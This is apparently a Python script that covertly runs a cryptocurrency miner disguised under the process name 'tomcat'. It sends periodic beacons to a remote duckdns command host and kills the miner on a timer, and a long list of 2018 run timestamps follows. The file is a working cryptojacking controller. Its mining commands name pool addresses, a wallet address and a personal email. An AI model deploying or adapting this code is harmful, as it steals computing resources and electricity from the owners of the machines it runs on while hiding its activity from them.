import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:05.897280
#2018-02-17 16:36:01.386170
#2018-02-17 18:23:05.962042
#2018-02-17 20:12:01.275976
#2018-02-17 21:58:01.632318
#2018-02-17 23:43:03.403365
#2018-02-18 01:33:06.531271
#2018-02-18 03:19:01.440161
#2018-02-18 05:08:05.060285
#2018-02-18 06:59:06.949760
#2018-02-18 08:47:05.283910
#2018-02-18 10:34:07.058421
#2018-02-18 12:19:01.927067
#2018-02-18 14:05:08.251411
#2018-02-18 15:56:06.166891
#2018-02-18 17:46:05.080079
#2018-02-18 19:34:06.203277
#2018-02-18 21:19:01.265197
#2018-02-18 23:07:01.991019
#2018-02-19 00:54:04.870239
#2018-02-19 02:41:04.218278
#2018-02-19 04:27:06.598835
#2018-02-19 06:12:07.852047
#2018-02-19 08:01:04.494799
#2018-02-19 09:51:02.086531
#2018-02-19 11:39:08.473835
#2018-02-19 13:26:06.264223
#2018-02-19 15:13:06.679577
#2018-02-19 17:01:07.530107
#2018-02-19 18:48:01.416069
#2018-02-19 20:37:04.188892
#2018-02-19 22:25:04.977961
#2018-02-20 00:11:04.073879
#2018-02-20 01:57:04.710719
#2018-02-20 03:46:07.125957
#2018-02-20 05:32:03.467928
#2018-02-20 07:16:04.540093
#2018-02-20 09:02:04.409827
#2018-02-20 10:45:03.471396
#2018-02-20 12:31:12.219376
#2018-02-20 14:17:07.286051
#2018-02-20 16:00:01.729435
#2018-02-20 17:45:17.006433
#2018-02-20 19:37:04.452096
#2018-02-20 21:24:06.534663
#2018-02-20 23:08:01.354694
#2018-02-21 00:53:06.430315
#2018-02-21 02:38:03.680146
#2018-02-21 04:26:04.448958
#2018-02-21 06:14:07.453444
#2018-02-21 08:00:08.440553
#2018-02-21 09:45:08.760106
#2018-02-21 11:36:06.182833
#2018-02-21 13:25:01.975830
#2018-02-21 15:10:01.961566
#2018-02-21 16:59:05.468505
#2018-02-21 18:48:09.240173
#2018-02-21 20:39:03.787963
#2018-02-21 22:24:06.319317
#2018-02-22 00:16:07.814058
#2018-02-22 02:04:05.328596
#2018-02-22 03:50:01.245363
#2018-02-22 05:36:06.201642
#2018-02-22 07:21:10.285232
#2018-02-22 09:09:07.246783
#2018-02-22 10:58:06.058404
#2018-02-22 12:45:07.096955
#2018-02-22 14:30:08.654784
#2018-02-22 16:16:04.481854
#2018-02-22 18:02:06.810695
#2018-02-22 19:52:06.704192
#2018-02-22 21:42:09.081358
#2018-02-22 23:29:06.874578
#2018-02-23 01:17:07.071968
#2018-02-23 03:03:06.379430
#2018-02-23 04:51:03.577782
#2018-02-23 06:37:01.470197
#2018-02-23 08:24:07.455904
#2018-02-23 10:40:08.844686
#2018-02-23 12:34:01.934153
#2018-02-23 14:20:06.699987
#2018-02-23 16:11:04.662148
#2018-02-23 17:57:07.452536
#2018-02-23 19:43:07.081799
#2018-02-23 21:25:01.361258
#2018-02-23 23:12:06.668943
#2018-02-24 00:55:09.250014
#2018-02-24 02:50:01.876211
#2018-02-24 05:28:08.127227
#2018-02-24 07:15:02.616201
#2018-02-24 09:06:03.877503
#2018-02-24 10:45:08.143299
#2018-02-24 12:27:04.527078
#2018-02-24 14:06:06.727082
#2018-02-24 15:46:05.106839
#2018-02-24 17:21:07.013465
#2018-02-24 18:53:03.884394
#2018-02-24 20:26:05.329701
#2018-02-24 21:59:05.099154
#2018-02-25 00:43:06.138521
#2018-02-25 02:43:05.032723
#2018-02-25 06:28:07.055122